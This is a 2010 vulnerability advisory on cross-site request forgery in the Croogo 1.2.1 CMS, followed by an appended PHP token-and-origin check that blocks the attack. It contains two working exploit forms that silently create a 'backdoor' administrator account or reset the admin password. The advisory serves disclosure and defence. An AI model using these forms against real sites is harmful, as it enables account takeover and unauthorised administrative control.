[#-----------------------------------------------------------------------------------------------#]
[#] Title: Croogo 1.2.1 Multiple CSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 07. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Croogo
[#] Version: 1.2.1
[#] Platform: PHP
[#] Site: http://www.croogo.org
[#] Download: http://croogo.googlecode.com/files/croogo-1.2.1.zip
[#] Vulnerability: Cross Site Request Forgery
[#-----------------------------------------------------------------------------------------------#]

The Croogo blog script has no cross-site request forgery protection on its admin actions, so a crafted form submitted from another site can add a new administrator or change an existing administrator's password.

[#] Content
|--CSRF
   |--Add Administrator
   |--Change Administrator's Password

[*] Add Administrator

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="/localhost/cro/admin/users/add" method="post">
<input type="hidden" name="_method" value="POST"/>
<input type="hidden" name="data[User][role_id]" value="1"/>
<input type="hidden" name="data[User][username]" value="backdoor"/>
<input type="hidden" name="data[User][password]" value="hacked"/>
<input type="hidden" name="data[User][name]" value="thisismyname"/>
<input type="hidden" name="data[User][email]" value="my@mail.com"/>
<input type="hidden" name="data[User][website]" value="website"/>
<input type="hidden" name="data[User][status]" value="1"/>
<input type="submit" name="submit" value="Submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[*] Change Administrator's Password

In this exploit, 1 is the ID of the admin user to edit.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="/localhost/cro/admin/users/reset_password/1" method="post">
<input type="hidden" name="_method" value="PUT"/>
<input type="hidden" name="data[User][id]" value="1"/>
<input type="hidden" name="data[User][username]" value="admin"/>
<input type="hidden" name="data[User][password]" value="hacked"/>
<input type="submit" name="submit" value="Submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#] EOF
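The server-side check that would have rejected both forms above, as an added example written for this advisory and not code from Croogo or CakePHP. It is plain PHP 7+ rather than the CakePHP 1.x API, and assumes the admin actions run under a PHP session and that every admin form embeds the token field it generates.

```php
<?php
// Added example, not Croogo's or CakePHP's own code: a synchronizer-token
// check for the admin actions targeted above. Assumes a PHP session is
// active and that every admin form embeds the csrf_field() below.
session_start();

// One random token per session, reused so several admin tabs keep working.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to place inside every state-changing admin form.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '"/>';
}

// True only if a state-changing request carries the session token. The method
// is read from "_method" first, so a PUT tunnelled through POST is checked too.
function csrf_verify(array $post, array $server): bool {
    $method = strtoupper($post['_method'] ?? $server['REQUEST_METHOD'] ?? 'GET');
    if (!in_array($method, ['POST', 'PUT', 'PATCH', 'DELETE'], true)) {
        return true; // GET/HEAD must not change state, nothing to protect
    }
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $sent === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $sent); // constant-time compare
}

// Defence in depth: a form hosted on another site cannot forge Origin/Referer.
function same_origin(array $server): bool {
    $host = strtolower(explode(':', $server['HTTP_HOST'] ?? '')[0]);
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $h) {
        if (!empty($server[$h])) {
            return $host !== '' && strtolower((string) parse_url($server[$h], PHP_URL_HOST)) === $host;
        }
    }
    return false; // no header at all: treat as cross-site for admin actions
}

// At the top of the users/add and users/reset_password actions:
if (!csrf_verify($_POST, $_SERVER) || !same_origin($_SERVER)) {
    http_response_code(403);
    exit('Invalid request');
}
```

The two forms in the advisory carry no csrf_token field and arrive with a foreign Origin/Referer, so either check alone is enough to turn them into a 403.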